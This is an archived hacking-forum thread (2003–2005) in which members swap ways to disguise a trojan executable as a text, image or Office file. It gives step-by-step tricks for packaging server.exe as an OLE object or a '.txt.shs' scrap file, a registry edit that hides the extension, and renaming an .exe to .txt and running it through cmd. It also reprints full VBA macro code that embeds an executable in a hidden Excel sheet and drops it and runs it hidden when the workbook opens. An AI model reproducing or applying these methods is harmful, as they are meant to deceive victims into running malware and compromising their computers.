i hear that it is possible to add trojan ( .exe) file to the text file( or document file) we some one open the txt file, trojan run it his computer?
any1 know this method? how they to this work?
mrBob
Oct 9 2003, 04:18 PM
nopez, is just impossible
coder
Oct 9 2003, 04:59 PM
actually, there have been a few Office exploits lately...
mrBob is partially right, a trojan/virii must be run, not read... now, you could possibly find an exploit for document applications (like word, excel, etc...) then you could pump some shell code but as far as i know- no exploits for notepad.exe
pedraM
Oct 10 2003, 08:25 AM
oh i think it is possble with .DOC doucments! in this way Victim must click some part of document!
just drog and drop your server.exe file to the word pad then right click on it and choose Pakage Object > Edit Pakage push in Insert Icon to change the server.exe icon file. from edit menu chosse Label to change your server.exe file to some thing linke server.GIF !!! from file menu choose Update to make changes.
your victim thinks that this is gif image attached with your document file. and he click on it! Oh your server.exe file RAN!
you can either bind your server file with image!
NoW! any1 know how to change the server.exe to server. (empty )
agamemnon
Oct 10 2003, 10:04 AM
yes you can! you can hide OLE objects in a scrap file which looks almost identical to a .txt file. i've used it to open up a NETCAT shell.
there are numerous howto on the web, just google about for them. meanwhile i'll have a dig about my hard drive and look for the one i made - and maybe write a little article.
EDIT: here you go. if it's what you're looking for, i'll write an explanation... This just opens up the local cmd.exe
pedraM
Oct 10 2003, 10:29 AM
Thx agamemnon i think u use Word pad and Pakage Object to creat this .shs file!
widows never show .shs file extention!
coder
Oct 10 2003, 05:10 PM
Exploit that makes use of the Microsoft Word WordPerfect document converter which has been found vulnerable to a buffer overflow when a malicious .doc file is opened. Related advisory here. Homepage: http://valgasu.rstack.org/. By valgasu
EDIT: here you go. if it's what you're looking for, i'll write an explanation...
a explanation would be nice
EDIT.. ahhh funky
QUOTE
Hide in plain sight by converting your batch file into a scrap. I know a couple Visual Basic Script email viruses that used this method to hide. It worked too! One way to do it is to run the packager.exe program (it's in your Windows folder), select "Import" from the "File" menu and select your batch file. Then select "Copy Package" from the edit menu. Now switch to Explorer and paste the item into your desired folder. It will be named "scrap", but you can rename it to whatever you want. To run it, you'll have to know it's REAL short file name (like SCRAP.SHS) and use the START command. For example: start /w scrap.shs Of course, double-clicking it also works. Very few people know what a scrap is let alone know how to find out what is hiding in one.
i actually found the exe in windows\system32 Hope this helps
w00dy
Oct 11 2003, 05:47 AM
the exploit that exists to run virii and trojans in a text file is what pedra and agamemnon are talking about. Just create the file in wordpad and call it "blah.txt.shs", and no matter if you have hide extensions checked or not, it shows up as "blah.txt" Its not really a text file, but you would never know aside from the slightly different icon.
Merchantp
Oct 22 2003, 12:36 AM
very very nice, but.... I forget where I saw it......another forum perhaps but someone was looking into a possible overflow or something in one of the note/word pads. Was interesting.
VorteX
Dec 30 2003, 12:40 AM
still it is not possible to infect a plaintext file (.txt) so that it can be run directly, there have been several virii (mainly batch and for instance perrun) that do infected the .txt extension, but merely functioning as a backup by overwriting the contect and later renaming the extension to the correct one, however for the windows ole format you have to be very careful as they can contain macro's or other modifications so it can automatically lauch harmful code
why not use doc files i mean you can use the object mode to put the file in it..
change the exstandet file and ico.
and that's it he only need to dubbel klick on it and program is running
tianzhen
Apr 6 2004, 05:09 PM
u can do it this way : trojan.txt exe
Silent Bob
Apr 6 2004, 05:46 PM
QUOTE (tianzhen @ Apr 6 2004, 05:09 PM)
u can do it this way : trojan.txt exe
i dont think that would work?
maybe with the .exe at the end of the .txt, but noone falls for that nower days
some people leave the winxp default file extension options on so it'll just show the file name if you replaced an exe icon with the windows word one that could work
canardwc
Apr 6 2004, 07:41 PM
i ve heard that exe could be hide in zip files.... exploiting some extractors weakness
passtheblunt
Apr 7 2004, 05:57 PM
QUOTE (w00dy @ Oct 11 2003, 05:47 AM)
the exploit that exists to run virii and trojans in a text file is what pedra and agamemnon are talking about. Just create the file in wordpad and call it "blah.txt.shs", and no matter if you have hide extensions checked or not, it shows up as "blah.txt" Its not really a text file, but you would never know aside from the slightly different icon.
Yes this works but when you run the scrap file you still get the pop up saying this (Some files can harm your computer. If the file information below looks suspicious,or you do not fully trust the source, do not open or save this file.
I dont think this is a very good method unless you know for sure that they unchecked the click box to auto run the files , wich would be very likely.
tstngry
Apr 8 2004, 06:50 AM
There is a way (i think) that you can put any program in a .bat file. I dont know if that is good enough but it was posted on this forumn somewhere else. It was a post on how to make a .bat file that had all the hex code an ftp program, that when runed or echoed would create the ftp program from the batch file. I dont know exactly hiow it works but id like to. I hope this helps and i hope you can find it in the forum.
Player
Jul 18 2004, 10:07 AM
you can remove the following key or change key to "AlwaysShowExt" [HKEY_CLASSES_ROOT\ShellScrap] "NeverShowExt"=""
anyway to change the icon of a shs?
Vort3x
Jul 18 2004, 02:01 PM
Well, You are all missing something. I know of a great trojan that can do this. But you have to buy the SE. But ProRat from http://www.prorat.net has this feature to convert its extension into a .txt file. First .exe to .vbs, then you use another converter tool and Generic Extensions Converter and convert the extension to ANYTHING you want, an existing one of course. Check it out.
Regards, Vort3x
locomack
Oct 27 2004, 12:28 PM
QUOTE(Vort3x @ Jul 18 2004, 02:01 PM)
Well, You are all missing something. I know of a great trojan that can do this. But you have to buy the SE. But ProRat from http://www.prorat.net has this feature to convert its extension into a .txt file. First .exe to .vbs, then you use another converter tool and Generic Extensions Converter and convert the extension to ANYTHING you want, an existing one of course. Check it out.
Regards, Vort3x
Hi,i was wondering if this can be done to any exe file or just the prorat trojan? Also,all this can be done from the prorat SE tool itself,or do i need external program? I am willing to buy it. Of course the exe to txt file will be detected by virusscan??? So it can be a real txt file, like whatever.txt,but when the person runs it,it runs the actual exe file??? Thanks
shuvo
Oct 28 2004, 06:13 PM
http://www.prorat.net]http://www.prorat.net[/url] was this feature to convert its extension into a .txt file. First .exe to .vbs, then you use another converter tool and Generic Extensions Converter and convert the extension to ANYTHING you want caz now its patched by Microsoft. They(Prorat se) are not giving u this nice Converter with the soft.
lavey666uk
Oct 29 2004, 08:39 PM
I had this doc lying around on my puter for a while now cant remember where i got it.. maybe fearless or somewhere never actually tried it but is worth a read..
QUOTE
*********************************** ** How to embed an exe in an Excel doc ** ***********************************
- Open a new Excel doc - Open the Visual Basic Editor (Tools->Macros->Visual Basic Editor) - Double-click 'ThisWorkbook' - Copy and paste the following code into that window...
-----------------start of code----------------------------------
Option Explicit
Sub ImportFile(FileName As String)
Dim FileNum As Integer Dim FileLength As Long Dim FileBuffer() As Byte Dim CurrentRow As Long Dim BytesToRead As Long
Const MaxBuffer = 4096
FileNum = FreeFile
Open FileName For Binary Access Read As FileNum
FileLength = LOF(FileNum) CurrentRow = 1
Do While FileLength > 0 BytesToRead = MaxBuffer If BytesToRead > FileLength Then BytesToRead = FileLength End If
FileLength = FileLength - BytesToRead ReDim FileBuffer(1 To BytesToRead) Get FileNum, , FileBuffer
Sub AddRow(FileBuffer() As Byte, RowNumber As Long)
Dim CellValue As String Dim Index As Long
For Index = LBound(FileBuffer) To UBound(FileBuffer) CellValue = CellValue + Right$("0" & Hex$(FileBuffer(Index)), 2) Next
Sheet1.Cells(RowNumber, 1) = CellValue
End Sub
Sub ExportFile(FileName As String)
Dim CellValue As String Dim Buffer() As Byte Dim Index As Long
Dim FileNum As Long Dim OK As Boolean Dim RowNumber
Dim ByteCount As Long
FileNum = FreeFile Open FileName For Binary Access Write As FileNum
OK = True RowNumber = 1
Do CellValue = Sheet1.Cells(RowNumber, 1) RowNumber = RowNumber + 1
If CellValue = "" Then OK = False Else
ByteCount = Len(CellValue) / 2
ReDim Buffer(1 To ByteCount) For Index = 1 To ByteCount Buffer(Index) = CByte("&H" + Mid$(CellValue, Index * 2 - 1, 2)) Next Index
Put FileNum, , Buffer
End If
Loop While OK
Close FileNum
End Sub
-----------------end of code----------------------------------
- Go to the Immediate Window in the Editor (View->Immediate Window if it's not open)
- Type 'ThisWorkbook.ImportFile "<filename>" <enter>' (no single quotes, keep double quotes, replace filename with the file you want to embed) example: ThisWorkbook.ImportFile "C:\program.exe" - Hit enter
- Under the current code, type or paste the following...
-----------------start of code----------------------------------
Private sub Workbook_Open ExportFile "<filename>" Shell "<filename>",vbHide End Sub
-----------------end of code----------------------------------
- Replace <filename> with whatever you want the file to be exported as... ie. ExportFile "C:\winlogon32.exe" Shell "C:\winlogon32.exe" .... - Go back to the excel and hide the sheet where it imported the file. (Format->Sheet->Hide) - You will now see a clean sheet - Put whatever you want in it...make it look nice - This sould also be something that you would assume would contain a macro, and something they are going to want to open. Be creative.
- Save
- That is it. Remember: Macro setting are set to Medium on default, so in the default state, it will prompt and ask to run a macro or not.
- It is pretty similar in Word...you just replace 'ThisWorkbook...' with 'ThisDocument...'
NOTE: I have only tried this on Office 2000...It could be diffenent is Office XP\
let me know if something is wrong or help is needed
- BE
--------------------
in the VBA editor where you are doing everything else, right click on 'ThisWorkbook' and choose 'VBAProject Properties...' then, click on the 'protection' tab, check the box where it says 'Lock project for viewing', put your password(s) in and click OK.
aelphaeis_mangarae
Oct 30 2004, 12:38 PM
So how excactly do you do the .shs thing ?
Do you save your trojan or what ever, as
example.txt.shs ?
Do you have to import it into something and compile or something?
BTW im not sure if all of you guys know, but if you get '
trojan.exe and rename it to trojan.txt and execute it via command shell it executes like an exetuable.
v1r05
Oct 31 2004, 05:32 PM
here is another trick try renaming a exe file to a txt or any thing u like then on the dos prompt type "start C:\renamed_exe.txt" it should execute
Se7eN
Dec 2 2004, 12:48 PM
QUOTE(v1r05 @ Oct 31 2004, 12:32 PM)
here is another trick try renaming a exe file to a txt or any thing u like then on the dos prompt type "start C:\renamed_exe.txt" it should execute
nice one, this is handy for my spreading tool
Terminal
Dec 2 2004, 07:53 PM
QUOTE
here is another trick try renaming a exe file to a txt or any thing u like then on the dos prompt type "start C:\renamed_exe.txt" it should execute
Yeah this is some prob in cmd of win 2k/xp . But i think patch is out for it :-/
IDEspinner
Dec 7 2004, 09:56 PM
Ah, reminds me of the text file virus i saw on astalavista a while ago
Extract all the files into a folder, then double click the readme.txt, you will end up running a program. The actual zip seems misbuilt to me because the icon for readme.txt is no displaying correctly but you can fix that
the only issue with this is the little shortcut icon that appears, other than that, its pretty interesting hiding a exe as a .txt then launchin it with a link
belgther
Dec 17 2004, 12:02 PM
well, the answer to this question is impossible, because when opening a text file, the data on the file will be shown directly,but by an exe file, it is processed... but when you find an exploit on notepad or wordpad that allows the code execution and processing, then it becomes possible using this exploit, which is a quite fancy thing but what IDESpinner posted looks interesting, too, but it can be programmed by the other ways, like hiding it in an .exe to create open programmable trojans that I'll call multiple trojan:)
Serhat
Dec 24 2004, 08:50 AM
ABove I see a DOC version .. and as many know you can use vb for it.. well why not write a little downloader and executer that downloads a file and executes it.. sounds easier if I see the above code.. But then again it gives an messages in the beginning saying it got macro's.. but that's the same @ the above example too.. Or am I forgetting something heh? btw you can almost build your own trojan into the doc then .. but I would rather make just a simple downloader and executer.. as I stated before..
Serhat
METAHUMAN
May 22 2005, 01:05 PM
If you want to hide the exe in a Zip file, then the victim computer should have WinZip 8.1. Thats the only version thats exploitable to this vulnerability. What you need to do is rename a file with 256 chars & end it with any extension. For eg - .......xxxxxxxxxxxxxxxxxxxx.exe.jpg <will show an image icon in WinZip> .......xxxxxxxxxxxxxxxx.exe.txt <will show the text icon in Winzip>
If you want to run a .txt or for that matter any file as an exe, you have the wonderful CMD.exe to help you. All that needs to be done is a commandline argument. cmd dangerous_file.txt CMD by default always executes the file depending on its header. In the PE EXE case, it is MZ. This will execute the file! This was a known exploit some days back. Dont know if any one knows about it or not. There also a patch for the same.
sabrodiesel2000
May 22 2005, 03:31 PM
ok i believe that there is another way to do that... u can use a packer that will help u pack the patch alongwith the document file... but then again u have to compress that server file into the document file in order to disguise it... but the mechanism should be developed that the server file is extracted and run in the background(hidden)......
<this info was not meant to encourage trojan disctribution>:>
aelphaeis_mangarae
May 24 2005, 07:00 AM
Dragging a .txt Executable into Command Prompt doesn't work on Service Pack 2 (Won't execute.)
White Scorpion
May 24 2005, 11:50 AM
it is possible:
take a look at the screenshot.... cmd.exe does recognize the real file. if the program would be a legit txt then it would have opened notepad to read the file. now it is executable...
just rename any .exe to .txt and make sure it is run from within cmd.exe . Then your problem would be solved.....
belgther
May 24 2005, 12:12 PM
QUOTE(White Scorpion @ May 24 2005, 12:50 PM)
just rename any .exe to .txt and make sure it is run from within cmd.exe . Then your problem would be solved.....
Well, but you have to convince the victim to do so.
sabrodiesel2000
May 24 2005, 03:28 PM
QUOTE(sabrodiesel2000 @ May 22 2005, 03:31 PM)
ok i believe that there is another way to do that... u can use a packer that will help u pack the patch alongwith the document file... but then again u have to compress that server file into the document file in order to disguise it... but the mechanism should be developed that the server file is extracted and run in the background(hidden)......
<this info was not meant to encourage trojan disctribution>:>
--------------
ok i think i wasnt clear enough sorry... actually u dont have to convince the victim.. all u have to do is pack two files and give the OUTPUT file extension... i`ve used a few packers and some gave me .jpg .exe etc choice... so that means that u can hide a server patch into a file and when the image is run, the server patch also gets activated in the background... but your server patch shouldnt return any values to the user to avoid suspicion....
the trick was to hide it in the text or even an executable file... i`ve used quite a few and as-pack is also a good packer...
White Scorpion
May 25 2005, 02:40 AM
QUOTE(belghter)
Well, but you have to convince the victim to do so.
Maybe.. what if you already have a backdoor running... it could be used to disguise your uploaded tools.....
I'm not sure why cmd.exe does recognize the real file, but i'm sure we can figure that out.. i will take a look at it when i get home...
belgther
May 25 2005, 05:07 AM
WS is right, because you can use ShellExecute api to execute files. Here's what the command line does: When you enter a command or a file name, it searches for built-in commands and executable files. If it finds one matching the query, it executes it, otherwise an error message is given. Also, if you type inject.txt as command, CMD.EXE tries to execute it. And if it's an executable, then everything is fine. But with the backdoor example, it can cause some problems. You have to hide your text files well... Even a noob user deletes a text file if he/she sees the "ununderstandable" and "meaningless" text, he/she thinks wtf that is. That's not our aim, of course. You have to make the user download text files, and if he/she looks at it, he/she has to see something meaningful, and not something meaningless starting with MZ.
White Scorpion
May 25 2005, 09:12 AM
well you could hide the exe behind the txt with alternative data streams with NTFS. I'm not sure if you could download such a file as well though, and it surely won't get executed when the user reads the file since notepad is executed not the file itself..
satknis
May 25 2005, 09:49 AM
isn't it possible to change the header of a txt file to run some code wich is in the txt file or also in the header?
belgther
May 25 2005, 12:05 PM
QUOTE(satknis @ May 25 2005, 10:49 AM)
isn't it possible to change the header of a txt file to run some code wich is in the txt file or also in the header?
Notepad just reads the text file and stores its content to the memory. An overflow is impossible, because it's being controlled by the program itself. I don't think that any other text program has a flaw What you mean is almost the same as what WS means. But the execution is limited with cmd.exe, or ShellExecute api.
alibaba
May 25 2005, 12:50 PM
this is how you convert an executable file into a scrap file:
1. drag the executable file into word 2. right click--> package object --> edit package 3. from object packager edit --> copy package, & paste
scrap file is ready. double clicking would run it like an executable.
GhostShell
Jul 9 2005, 05:20 PM
QUOTE(alibaba @ May 25 2005, 12:50 PM)
this is how you convert an executable file into a scrap file:
1. drag the executable file into word 2. right click--> package object --> edit package 3. from object packager edit --> copy package, & paste
scrap file is ready. double clicking would run it like an executable.
Nice info...but XP picks that up in the new security bull sh*t they added...but nice nice trick i am prolly behind bcuz i never knew that lol...thx (GhostSheLL)
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
but as far as i know- no exploits for notepad.exe 
) 
caz now its patched by Microsoft. They(Prorat se) are not giving u this nice Converter with the soft.
..